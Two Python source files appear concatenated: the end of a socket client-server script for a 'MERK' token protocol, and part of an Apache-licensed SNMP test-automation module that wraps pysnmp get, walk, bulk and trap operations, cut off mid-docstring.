return data
def forMerkServerMaybe(port, cycles):
HOST = '' # Symbolic name meaning all available interfaces
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((HOST, port))
s.listen(100)
count = 0
while count < cycles * 4:
count += 1
conn, addr = s.accept()
priv_value = forMERKGetServerPrivateValue()
token_vals = MERKFlagTokenAndTimeSlot()
p2 = Process(target=slaveServer, args=(
[conn.recv, conn.send, conn.close], addr, priv_value, token_vals, forMerkStateMachineServer))
p2.start()
def slaveServer(conn, addr, priv_value, token_vals, forMerkStateMachineServer):
old_len = -1
data = ""
while len(data) > old_len:
data = conn[0](1024)
old_len = len(data)
to_send = forMerkStateMachineServer(data.decode(), priv_value, token_vals)
sended = conn[1](bytes(to_send, 'utf-8'))
print("Sending S->C :" + str(to_send) + " to " + str(addr))
time.sleep(0.04)
    conn[2]()  # close the connection
return to_send, data, sended
def main(argv):
obj = "127.0.0.1"
port = 4450
cycles = 1
delay = 10
    wrong_configuration = ""  # collects codes of arguments that failed to parse
for arg in argv:
if arg.split(":")[0] == "ip":
try:
obj = arg.split(":")[1]
except:
wrong_configuration += "1"
elif arg.split(":")[0] == "port":
try:
port = int(arg.split(":")[1])
if port > 65535 or port < 1025:
port = 4450
wrong_configuration += "2"
except:
wrong_configuration += "2"
elif arg.split(":")[0] == "cycles":
try:
cycles = int(arg.split(":")[1])
except:
wrong_configuration += "3"
elif arg.split(":")[0] == "delay":
try:
delay = int(arg.split(":")[1])
except:
wrong_configuration += "4"
p1 = Process(target=forMerkServerMaybe, args=(port, cycles,))
p1.start()
count = 0
while count < cycles:
count += 1
p2 = Process(target=MERKClient, args=(obj + ":" + str(port), forMerkSendData, forMerkStateMachineClient))
p2.start()
time.sleep(delay)
p1.kill()
return obj, str(port), str(cycles), str(delay), str(wrong_configuration)
if __name__ == '__main__':
main(sys.argv[1:])
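# Example invocation (arguments are key:value pairs; all of them are optional):
#     python main.py ip:127.0.0.1 port:4450 cycles:1 delay:10
# Malformed values fall back to the defaults above and are recorded in
# wrong_configuration.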
|
common_snmp_actions.py
|
'''
Copyright 2017, Fujitsu Network Communications, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
"""
Implementation of the standard SNMP protocol commands for SNMP v1, v2c and v3,
with IPv6 support.
SNMP v3 Trap and Inform support added.
"""
import os, re, ast
import socket
from warrior.Framework import Utils
from warrior.Framework.Utils.print_Utils import print_exception
from warriorsnmp.ClassUtils.snmp_utlity_class import WSnmp as ws
from warrior.Framework.Utils import testcase_Utils, config_Utils, data_Utils
from warriorsnmp.Utils import snmp_utils
from threading import Thread
from time import sleep
try:
from pysnmp.entity.rfc3413 import ntfrcv
from pysnmp.smi import builder, view, compiler, rfc1902, error
except ImportError:
testcase_Utils.pNote("Please Install PYSNMP 4.3.8 or Above", "error")
class CommonSnmpActions(object):
"""
Class for standard SNMP protocol commands
"""
def __init__(self):
"""
        This is the initialization.
"""
self.resultfile = Utils.config_Utils.resultfile
self.datafile = Utils.config_Utils.datafile
self.logsdir = Utils.config_Utils.logsdir
self.filename = Utils.config_Utils.filename
self.logfile = Utils.config_Utils.logfile
self.snmpver = {'1':'0', '2':'1', '2c':'1', '3':'2'}
def snmp_get(self, snmp_ver, system_name, mib_name=None,
mib_index=None, mib_value=None,
oid_string=None, communityname=None,
snmp_timeout=60,
userName=None, authKey=None, privKey=None, authProtocol=None,
privProtocol=None,
custom_mib_paths=None,
load_mib_modules=None):
"""
snmp_get uses the SNMP GET request to query for information on a
network entity
:Datafile usage:
1.(string) Agents IP address. address="192.168.1.68"
2.(string) SNMP UDP port. port="161"
:Arguments:
1.communityname : SNMP v1/v2c community string. e.g. 'public'
2. snmp_ver: Support for v1 and V2 and V3 1 for v1, 2 for V2, 3 for V3
3.mib_name : Name of the Management Information Base e.g. 'IF-MIB'
4.mib_index: MIB index name e.g. 'ipAdEntAddr'
5.mib_value: e.g. '127.0.0.1'
6.oid_string: object identifiers (OIDs) that are available on the
managed device.
e.g. '1.3.6.1.2.1.2.2.1.6' which is, ifPhysAddress
The physical address of the interface.
User can provide either MIB or oid_string.
7.system_name(string) = Name of the system from the input datafile
            8.snmp_timeout: Number of seconds the SNMP manager will wait for a
                response from the SNMP Agent. In case of an SNMP walk this may
                need to be set higher.
#arguments 9-13 are only for SNMPv3 or mpModel = 2 and in that
# case communityname will be None
9.userName(string) = A human readable string representing the
name of the SNMP USM user.
e.g. 'usr1'
10.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
11.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
12.authProtocol(string) = An indication of whether messages sent on behalf of
this USM user can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol="1,3,6,1,6,3,10,1,1,2"
13.privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
e.g. privProtocol="1,3,6,1,6,3,10,1,2,2"
            14.custom_mib_paths: User can provide multiple MIB source paths separated by commas (',')
                Source path can be a URL or an absolute directory path. Refer to the example below.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
            15.load_mib_modules: User can provide the MIB name(s) that need to be loaded
from the path "custom_mib_path".
It is a string of MIB names separated by comma(',')
:Return:
status(bool)= True / False.
output_dict = consists of following key value:
1.errindication: If this string is not empty, it indicates the SNMP
engine error.
2.errstatus: If this element evaluates to True, it indicates an
error in the SNMP communication.Object that generated
the error is indicated by the errindex element.
3.errindex: If the errstatus indicates that an error has occurred,
this field can be used to find the SNMP object that
caused the error. The object position in the result
array is errindex-1.
4.result: This element contains a list of all returned SNMP object
elements. Each element is a tuple that contains the name
of the object and the object value.
"""
wdesc = "Executing SNMP GET command"
Utils.testcase_Utils.pSubStep(wdesc)
status = False
snmp_parameters = ['ip', 'snmp_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ipaddr = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_port')
output_dict = {}
temp_custom_mib_paths = None
wsnmp = ws(communityname, self.snmpver.get(snmp_ver), ipaddr, port, snmp_timeout,
userName, authKey, privKey, authProtocol,
privProtocol)
cmdgen = wsnmp.commandgenerator()
        if self.snmpver.get(snmp_ver) == '2':  # for snmp v3
auth_data = wsnmp.usmuserdata()
else: #for snmp v1 or v2c
auth_data = wsnmp.communitydata()
if ':' in ipaddr:#for ipv6
transport = wsnmp.udp6transporttarget()
else: #for ipv4
transport = wsnmp.udptransporttarget()
if custom_mib_paths:
temp_custom_mib_paths = snmp_utils.split_mib_path(custom_mib_paths)
        if oid_string is None and mib_name is None:
testcase_Utils.pNote("Please provide OID or MIB Information!", "error")
if oid_string:
oid = tuple([int(e) if e.isdigit() else e for e in oid_string.split('.')])
else:
if custom_mib_paths:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value).\
addAsn1MibSource(*temp_custom_mib_paths)
else:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value)
try:
errindication, errstatus,\
errindex, result = cmdgen.getCmd(auth_data, transport, oid)
output_dict = {
'{0}_errindication'.format(system_name):errindication,
'{0}_errstatus'.format(system_name):errstatus,
'{0}_errindex'.format(system_name):errindex,
'{0}_result'.format(system_name):result,
'{0}_custom_mib_paths'.format(system_name):temp_custom_mib_paths,
'{0}_load_mib_modules'.format(system_name):load_mib_modules
}
if result != []:
status = True
testcase_Utils.pNote("Successfully executed SNMP GET command {}"
.format(result), "info")
else:
testcase_Utils.pNote("Failure SNMP Command Return Null Value! {}"
.format(result), "error")
except wsnmp.exception as excep:
status = False
testcase_Utils.pNote("SNMP GET command Failed!\n{}".format(excep), "error")
Utils.testcase_Utils.report_substep_status(status)
return status, output_dict
def snmp_getnext(self, snmp_ver, system_name, mib_name=None,
mib_index=None, mib_value=None,
oid_string=None, communityname=None,
snmp_timeout=60, max_rows=1,
userName=None, authKey=None, privKey=None, authProtocol=None,
privProtocol=None, custom_mib_paths=None, load_mib_modules=None):
"""
snmp_get_next uses the SNMP GETNEXT request to query for information
on a network entity
:Datafile usage:
1.(string) Agents IP address. address="192.168.1.68"
2.(string) SNMP UDP port. port="161"
:Arguments:
1.communityname : SNMP v1/v2c community string. e.g. 'public'
2. snmp_ver: Support for v1 and V2 and V3 1 for v1, 2 for V2, 3 for V3
3.mib_name : Name of the Management Information Base e.g. 'IF-MIB'
4.mib_index: MIB index name e.g. 'ipAdEntAddr'
5.mib_value: e.g. '127.0.0.1'
6.oid_string: object identifiers (OIDs) that are available on the
managed device.
e.g. '1.3.6.1.2.1.2.2.1.6' which is, ifPhysAddress
The physical address of the interface.
User can provide either MIB or oid_string.
7. system_name(string) = Name of the system from the input datafile
            8. snmp_timeout: Number of seconds the SNMP manager will wait for a
                response from the SNMP Agent. In case of an SNMP walk this may
                need to be set higher.
            9.max_rows: Defaults to 1. Increase it to retrieve more GETNEXT
                results starting from the given OID or MIB value.
#arguments 9-13 are only for SNMPv3 or mpModel = 2 and in that
# case communityname will be None
10.userName(string) = A human readable string representing the
name of the SNMP USM user.
e.g. 'usr1'
11.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
12.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
13.authProtocol(string) = An indication of whether messages sent on behalf of this
USM user can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol='1,3,6,1,6,3,10,1,1,2'
14.privProtocols(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
e.g. privProtocol='1,3,6,1,6,3,10,1,2,2)'
            15.custom_mib_paths: User can provide multiple MIB source paths separated by commas (',')
                Source path can be a URL or an absolute directory path. Refer to the example below.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
            16.load_mib_module: User can provide the MIB name(s) that need to be loaded from the path
                "custom_mib_path". It is a string of MIB names separated by commas (',')
:Return:
status(bool)= True / False.
output_dict = consists of following key value:
1.errindication: If this string is not empty, it indicates
the SNMP engine error.
2.errstatus: If this element evaluates to True,it indicates an error
in the SNMP communication.Object that generated
the error is indicated by the errindex element.
3.errindex: If the errstatus indicates that an error has occurred,
this field can be used to find the SNMP object that
caused the error.
The object position in the result array is errindex-1.
4.result: This element contains a list of all returned SNMP object
elements. Each element is a tuple that contains the name
of the object and the object value.
"""
wdesc = "Executing SNMP GETNEXT command"
Utils.testcase_Utils.pSubStep(wdesc)
status = False
snmp_parameters = ['ip', 'snmp_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ipaddr = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_port')
output_dict = {}
temp_custom_mib_paths = None
wsnmp = ws(communityname, self.snmpver.get(snmp_ver), ipaddr, port, snmp_timeout,
userName, authKey, privKey, authProtocol,
privProtocol)
cmdgen = wsnmp.commandgenerator()
        if self.snmpver.get(snmp_ver) == '2':  # for snmp v3
auth_data = wsnmp.usmuserdata()
else: #for snmp v1 or v2c
auth_data = wsnmp.communitydata()
if ':' in ipaddr:#for ipv6
transport = wsnmp.udp6transporttarget()
else: #for ipv4
transport = wsnmp.udptransporttarget()
if custom_mib_paths:
temp_custom_mib_paths = snmp_utils.split_mib_path(custom_mib_paths)
        if oid_string is None and mib_name is None:
testcase_Utils.pNote("Please provide OID or MIB Information!", "error")
if oid_string:
oid = tuple([int(e) if e.isdigit() else e for e in oid_string.split('.')])
else:
if custom_mib_paths:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value).\
addAsn1MibSource(*temp_custom_mib_paths)
else:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value)
try:
errindication, errstatus, errindex, \
result = cmdgen.nextCmd(auth_data,
transport, oid,
ignoreNonIncreasingOid=True, maxRows=int(max_rows),
lookupNames=True, lookupValues=True, lexicographicMode=True)
# maxRows=1 will control the mib walk
output_dict = {
'{0}_errindication'.format(system_name):errindication,
'{0}_errstatus'.format(system_name):errstatus,
'{0}_errindex'.format(system_name):errindex,
'{0}_result'.format(system_name):result,
'{0}_custom_mib_paths'.format(system_name):temp_custom_mib_paths,
'{0}_load_mib_modules'.format(system_name):load_mib_modules}
if result != []:
status = True
testcase_Utils.pNote("Successfully executed SNMP GET-NEXT "
"command {}".format(result), "info")
else:
testcase_Utils.pNote("Failure SNMP Command Return Null Value! {} {} {} {} xyz".
format(result, errindication, errstatus, errindex), "error")
except wsnmp.exception as excep:
status = False
testcase_Utils.pNote("SNMP GET-Next command Failed! \n{}".format(excep), "error")
Utils.testcase_Utils.report_substep_status(status)
return status, output_dict
def snmp_walk(self, snmp_ver, system_name, mib_name=None, mib_index=None,
mib_value=None, oid_string=None, communityname=None,
snmp_timeout=60, userName=None, authKey=None, privKey=None,
authProtocol=None, privProtocol=None, custom_mib_paths=None,
load_mib_modules=None, lexicographicMode="False"):
"""
snmp_walk uses the SNMP WALK request to query for information on
a network entity
:Datafile usage:
1.(string) Agents IP address. address="192.168.1.68"
2.(string) SNMP UDP port. port="161"
:Arguments:
1.communityname : SNMP v1/v2c community string. e.g. 'public'
2. snmp_ver: Support for v1 and V2 and V3 1 for v1, 2 for V2, 3 for V3
3.mib_name : Name of the Management Information Base e.g. 'IF-MIB'
4.mib_index: MIB index name e.g. 'ipAdEntAddr'
5.mib_value: e.g. '127.0.0.1'
6.oid_string: object identifiers (OIDs) that are available on the
managed device.
e.g. '1.3.6.1.2.1.2.2.1.6' which is, ifPhysAddress
The physical address of the interface.
User can provide either MIB or oid_string.
7. system_name(string) = Name of the system from the input datafile
            8. snmp_timeout: Number of seconds the SNMP manager will wait for a
                response from the SNMP Agent. In case of an SNMP walk this may
                need to be set higher.
#arguments 9-13 are only for SNMPv3 or mpModel = 2 and in that
# case communityname will be None
9.userName(string) = A human readable string representing the
name of the SNMP USM user.
e.g. 'usr1'
10.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
11.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
12.authProtocol(string) = An indication of whether messages sent on behalf of this
USM user can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol='1,3,6,1,6,3,10,1,1,2'
13.privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
e.g. privProtocol='1,3,6,1,6,3,10,1,2,2'
            14.custom_mib_paths: User can provide multiple MIB source paths separated by commas (',')
                Source path can be a URL or an absolute directory path. Refer to the example below.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
            15.load_mib_modules: User can provide the MIB name(s) that need to be loaded from the path
                "custom_mib_path". It is a string of MIB names separated by commas (',')
            16.lexicographicMode : "True" will return everything under the given prefix plus the next
                table as well, e.g. a request for 1.3.6.1 will also return 1.3.6.2.
                "False" will return only entries under the given prefix. Defaults to False.
:Return:
status(bool)= True / False.
output_dict = consists of following key value:
1.errindication: If this string is not empty, it indicates
the SNMP engine error.
2.errstatus: If this element evaluates to True,it indicates an error
in the SNMP communication.Object that generated
the error is indicated by the errindex element.
3.errindex: If the errstatus indicates that an error has occurred,
this field can be used to find the SNMP object that
caused the error.
The object position in the result array is errindex-1.
4.result: This element contains a list of all returned SNMP object
elements. Each element is a tuple that contains the name
of the object and the object value.
"""
wdesc = "Executing SNMP WALK command"
Utils.testcase_Utils.pSubStep(wdesc)
status = False
snmp_parameters = ['ip', 'snmp_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ipaddr = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_port')
output_dict = {}
temp_custom_mib_paths = None
wsnmp = ws(communityname, self.snmpver.get(snmp_ver), ipaddr, port, snmp_timeout,
userName, authKey, privKey, authProtocol,
privProtocol)
cmdgen = wsnmp.commandgenerator()
        if self.snmpver.get(snmp_ver) == '2':  # for snmp v3
auth_data = wsnmp.usmuserdata()
else: #for snmp v1 or v2c
auth_data = wsnmp.communitydata()
if ':' in ipaddr:#for ipv6
transport = wsnmp.udp6transporttarget()
else: #for ipv4
transport = wsnmp.udptransporttarget()
        if oid_string is None and mib_name is None:
testcase_Utils.pNote("Please provide OID or MIB Information!", "error")
if custom_mib_paths:
temp_custom_mib_paths = snmp_utils.split_mib_path(custom_mib_paths)
if oid_string: #OID String is optional
oid = tuple([int(e) if e.isdigit() else e for e in oid_string.split('.')])
else:
if custom_mib_paths:
oid = wsnmp.mibvariable(mib_name, mib_index).\
addAsn1MibSource(*temp_custom_mib_paths)
else:
oid = wsnmp.mibvariable(mib_name, mib_index)
try:
errindication, errstatus, errindex,\
result = cmdgen.nextCmd(auth_data,
transport,
oid, lexicographicMode=ast.literal_eval(lexicographicMode.
capitalize()),
ignoreNonIncreasingOid=True, maxRows=50000,
lookupNames=True, lookupValues=True)
output_dict = {
'{0}_errindication'.format(system_name):errindication,
'{0}_errstatus'.format(system_name):errstatus,
'{0}_errindex'.format(system_name):errindex,
'{0}_result'.format(system_name):result,
'{0}_custom_mib_paths'.format(system_name):temp_custom_mib_paths,
'{0}_load_mib_modules'.format(system_name):load_mib_modules
}
if result != []:
status = True
testcase_Utils.pNote("Successfully executed SNMP WALK command {}".
format(result), "info")
else:
testcase_Utils.pNote("Failure SNMP Command Return Null Value! {} {} {}".
format(result, errindication.prettyPrint(),
errstatus.prettyPrint()), "error")
except wsnmp.exception as excep:
status = False
testcase_Utils.pNote("SNMP Walk command Failed!\n{}".format(excep), "error")
Utils.testcase_Utils.report_substep_status(status)
return status, output_dict
def snmp_bulkget(self, snmp_ver, system_name, mib_name=None,
mib_index=None, mib_value=None,
oid_string=None, communityname=None,
snmp_timeout=60, nonrepeaters='0', maxrepetitions='10',
userName=None, authKey=None, privKey=None, authProtocol=None,
privProtocol=None, custom_mib_paths=None, load_mib_modules=None,
lexicographicMode="False"):
"""
snmp_bulkget uses the SNMP BULKGET request to query for information on
a network entity
:Datafile usage:
1.(string) Agents IP address. address="192.168.1.68"
2.(string) SNMP UDP port. port="161"
:Arguments:
1.communityname : SNMP v1/v2c community string. e.g. 'public'
2. snmp_ver: Support for v1 and V2 and V3 1 for v1, 2 for V2, 3 for V3
3.mib_name : Name of the Management Information Base e.g. 'IF-MIB'
4.mib_index: MIB index name e.g. 'ipAdEntAddr'
5.mib_value: e.g. '127.0.0.1'
6.oid_string: object identifiers (OIDs) that are available on the
managed device.
e.g. '1.3.6.1.2.1.2.2.1.6' which is, ifPhysAddress
The physical address of the interface.
User can provide either MIB or oid_string.
7. system_name(string) = Name of the system from the input datafile
            9. snmp_timeout: Number of seconds the SNMP manager will wait for a
                response from the SNMP Agent. In case of an SNMP walk this may
                need to be set higher.
#arguments 9-13 are only for SNMPv3 or mpModel = 2 and in that
# case communityname will be None
10.userName(string) = A human readable string representing the
name of the SNMP USM user.
e.g. 'usr1'
11.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
12.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
13.authProtocol(string) = An indication of whether messages sent on behalf of this
USM user can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol='1,3,6,1,6,3,10,1,1,2'
14.privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
e.g. privProtocol='1,3,6,1,6,3,10,1,2,2'
            15.custom_mib_paths: User can provide multiple MIB source paths separated by commas (',')
                Source path can be a URL or an absolute directory path. Refer to the example below.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
            16.load_mib_modules: User can provide the MIB name(s) that need to be loaded from the path "custom_mib_path".
                It is a string of MIB names separated by commas (',')
            17.lexicographicMode : "True" will return everything under the given prefix plus the next
                table as well, e.g. a request for 1.3.6.1 will also return 1.3.6.2.
                "False" will return only entries under the given prefix. Defaults to False.
18. maxrepetitions: This specifies the maximum number of iterations over the repeating variables. The default is 10.
19. nonrepeaters : This specifies the number of supplied variables that should not be iterated over. default is 0
:Return:
status(bool)= True / False.
output_dict = consists of following key value:
1.errindication: If this string is not empty, it indicates
the SNMP engine error.
2.errstatus: If this element evaluates to True,it indicates an error
in the SNMP communication.Object that generated
the error is indicated by the errindex element.
3.errindex: If the errstatus indicates that an error has occurred,
this field can be used to find the SNMP object that
caused the error.
The object position in the result array is errindex-1.
4.result: This element contains a list of all returned SNMP object
elements. Each element is a tuple that contains the name
of the object and the object value.
"""
wdesc = "Executing SNMP BULKGET command"
Utils.testcase_Utils.pSubStep(wdesc)
status = False
snmp_parameters = ['ip', 'snmp_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ipaddr = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_port')
output_dict = {}
temp_custom_mib_paths = None
wsnmp = ws(communityname, self.snmpver.get(snmp_ver), ipaddr, port, snmp_timeout,
userName, authKey, privKey,authProtocol,
privProtocol)
cmdgen = wsnmp.commandgenerator()
        if self.snmpver.get(snmp_ver) == '2':  # for snmp v3
auth_data = wsnmp.usmuserdata()
else: #for snmp v1 or v2c
auth_data = wsnmp.communitydata()
if ':' in ipaddr:#for ipv6
transport = wsnmp.udp6transporttarget()
else: #for ipv4
transport = wsnmp.udptransporttarget()
if custom_mib_paths:
temp_custom_mib_paths = snmp_utils.split_mib_path(custom_mib_paths)
        if oid_string is None and mib_name is None:
testcase_Utils.pNote("Please provide OID or MIB Information!", "error")
if oid_string:
oid = tuple([int(e) if e.isdigit()
else e for e in oid_string.split('.')])
else:
if custom_mib_paths:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value).addAsn1MibSource(*temp_custom_mib_paths)
else:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value)
try:
errindication, errstatus, errindex, \
result = cmdgen.bulkCmd(auth_data,
transport,
int(nonrepeaters), int(maxrepetitions), oid,
lookupNames=True,
lookupValues=True,
lexicographicMode=ast.literal_eval(lexicographicMode.capitalize()),
maxRows=int(maxrepetitions)
)
# nonrepeaters(1)(int): One MIB variable is requested in response
# for the first nonRepeaters MIB variables in request.
# maxRepetitions(25)(int): maxRepetitions MIB variables are
# requested in response for each of the remaining MIB variables in
# the request (e.g. excluding nonRepeaters). Remote SNMP engine may
# choose lesser value than requested.
output_dict = {
'{0}_errindication'.format(system_name):errindication,
'{0}_errstatus'.format(system_name):errstatus,
'{0}_errindex'.format(system_name):errindex,
'{0}_result'.format(system_name):result,
'{0}_custom_mib_paths'.format(system_name):temp_custom_mib_paths,
'{0}_load_mib_modules'.format(system_name):load_mib_modules}
if result != []:
status = True
testcase_Utils.pNote("Successfully executed SNMP BULK GET "
"command {}".format(result), "info")
else:
testcase_Utils.pNote("Failure SNMP Command Return Null Value! {}".format(result), "error")
except wsnmp.exception as excep:
status = False
testcase_Utils.pNote("SNMP BULK GET command Failed!\n{}".format(excep), "error")
Utils.testcase_Utils.report_substep_status(status)
return status, output_dict
def verify_snmp_action(self, system_name, snmp_result, mib_string=None
):
"""
Will Verify SNMP get/getnext/walk/getbulk actions.
:Datafile usage:
NA
:Arguments:
1. system_name(string) = Name of the system from the input datafile
2. mib_string(string) = MIB string
e.g.'SNMPv2-SMI::enterprises.3861.3.2.100.1.2.0'
3. result(string) = SNMP Output string
e.g. '1Finity-T100'
:Returns:
1. status(bool)
"""
wdesc = "Verify the SNMP Action Results"
Utils.testcase_Utils.pSubStep(wdesc)
errindication = Utils.data_Utils.get_object_from_datarepository(str(system_name)+"_errindication")
varBindTable = Utils.data_Utils.get_object_from_datarepository(str(system_name)+"_result")
errorstatus = Utils.data_Utils.get_object_from_datarepository(str(system_name)+"_errstatus")
errindex = Utils.data_Utils.get_object_from_datarepository(str(system_name)+"_errindex")
custom_mib_paths = Utils.data_Utils.get_object_from_datarepository(str(system_name)+"_custom_mib_paths")
load_mib_modules = Utils.data_Utils.get_object_from_datarepository(str(system_name)+"_load_mib_modules")
#Non-empty errorIndication string indicates SNMP engine-level error.
#The pair of errorStatus and errorIndex variables determines SNMP
#PDU-level error. If errorStatus evaluates to true, this indicates SNMP
#PDU error caused by Managed Object at position errorIndex-1 in \
#varBinds. Doing errorStatus.prettyPrint() would return an
# explanatory text error message.
result_list = []
status = False
if errindication:
testcase_Utils.pNote("%s" % errindication.prettyPrint())
else:
if errorstatus:
testcase_Utils.pNote('%s at %s' % (errorstatus.prettyPrint(),
errindex and
varBindTable[-1][int(errindex)-1][0]or '?'))
else:
if varBindTable:
if type(varBindTable[0]) is not list:
# for SNMP Get/Get-Next output only
for name, val in varBindTable:
result_list.append(snmp_utils.translate_mib(custom_mib_paths, load_mib_modules, name, val))
else:
# for SNMP Getbulk/walk output only
for varBindTableRow in varBindTable:
for name, val in varBindTableRow:
result_list.append(snmp_utils.translate_mib(custom_mib_paths, load_mib_modules, name, val))
else:
testcase_Utils.pNote("No SNMP Result Present!", 'error')
for element in result_list:
if mib_string:
if mib_string in element[0] and snmp_result in element[-1]:
status = True
testcase_Utils.pNote('%s and %s found in SNMP Output' %(
mib_string, snmp_result))
break
else:
if snmp_result in element[-1]:
status = True
testcase_Utils.pNote('%s Found! in SNMP Output' %(
snmp_result))
break
if status == False:
if mib_string:
testcase_Utils.pNote('{} and {} NOT Found in SNMP Output'.format(mib_string, snmp_result))
else:
testcase_Utils.pNote('{} NOT Found in SNMP Output'.format(snmp_result))
Utils.testcase_Utils.report_substep_status(status)
return status
def add_snmp_v3_user(self, port, username, securityEngineId,
authkey=None, privkey=None,
authProtocol=None, privProtocol=None):
"""
Add SNMP V3 User for TRAP and Inform
Argument:
1. port: SNMP trap or inform port.
2. username(string) = snmp v3 username.
3. securityEngineId(string) = SNMP v3 secure engine id which is a mandatory
                argument for any V3 user. Both sender and receiver should know
this id. refer: http://www.net-snmp.org/tutorial/tutorial-5/commands/snmptrap-v3.html
4.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
5.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
6.authProtocol(string) = An indication of whether messages sent on behalf of this USM user
can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol="1,3,6,1,6,3,10,1,1,2"
7.privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
e.g. privProtocol="1,3,6,1,6,3,10,1,2,2"
Return: True or False
"""
status = True
wdesc = "Add SNMP V3 User for TRAP and Inform"
Utils.testcase_Utils.pSubStep(wdesc)
status = ws.add_user(port, username, securityEngineId,
authkey, privkey, authProtocol, privProtocol)
Utils.testcase_Utils.report_substep_status(status)
return status
def add_snmp_community(self, port, community_string):
"""
Add the SNMP community string
:param port: SNMP TRAP or Inform PORT
:param community_string: SNMP community String
:return:
"""
status = True
status = ws.add_community(port, community_string)
Utils.testcase_Utils.report_substep_status(status)
return status
def start_trap_listener(self, system_name,
custom_mib_path=None,
load_mib_module='SNMPv2-MIB,SNMP-COMMUNITY-MIB'
):
"""
        Start the trap listener on the given port and IP address. It creates a socket
        with the given port and IP. The trap listener supports SNMP v1, v2c and v3.
Arguments:
system_name: SNMP Agents system name from the data file.
            custom_mib_path: User can provide multiple MIB source paths separated by commas (',')
                Source path can be a URL or an absolute directory path. Refer to the example below.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
            load_mib_module: User can provide the MIB name(s) that need to be loaded from the path "custom_mib_path".
It is a string of MIB names separated by comma(',')
e.g. "FSS-COMMON-TC,FSS-COMMON-LOG,FSS-COMMON-SMI"
Data File Usage:
<ip> : Ip of the agent. It has to be IP not a hostname.
<snmp_port>: SNMP Port. UDP port e.g. 161 or 1036.
<snmp_trap_port> : SNMP trap port. UDP port e.g. 162 or any othe custom port.1036
if NESNMP or any other SNMP protocol is using the 162 port please use any other port other than 162.
<community>: form this release community string is mandatory for v2 and v1 SNMP trap.
you can add multiple community like 'public,testing' or single like 'public'
<snmp_username>: For SNMP v3 this and engine id are mandatory argument. e.g. 'user_snmp1234'
<securityEngineId>: One mandatory argument for V3 trap and inform.e.g. '80000F150000000000000000'.
            For noAuthNoPriv none of the attributes below are required.
<authkey>: Auth password. e.g. 'authkey123'
